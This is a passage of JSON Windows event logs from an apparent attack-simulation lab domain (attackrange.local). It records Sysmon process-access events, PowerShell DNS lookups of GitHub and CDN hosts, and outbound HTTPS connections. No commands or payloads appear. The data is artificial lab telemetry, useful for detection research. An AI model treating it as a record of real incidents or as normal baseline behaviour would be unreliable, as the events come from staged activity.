{"EventTime":"2020-08-01 06:55:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:04.522\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:04.522","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.054\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3400\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.054","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3400","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5157,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.317\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: raw.githubusercontent.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 github.map.fastly.net;::ffff:199.232.64.133;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.317","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"raw.githubusercontent.com","QueryStatus":"0","QueryResults":"type:  5 github.map.fastly.net;::ffff:199.232.64.133;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5158,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:02.389\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.4;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:02.389","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.4;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5159,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:02.541\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: codeload.github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.10;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:02.541","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"codeload.github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.10;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5160,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.819\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52654\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 104.117.16.77\r\nDestinationHostname: a104-117-16-77.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.819","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52654","DestinationIsIpv6":"false","DestinationIp":"104.117.16.77","DestinationHostname":"a104-117-16-77.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5161,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.869\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52655\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.869","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52655","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:05.523\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:05.523","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76864,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 06:55:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5163,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.860\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.860","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:06.523\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:06.523","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:07.523\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 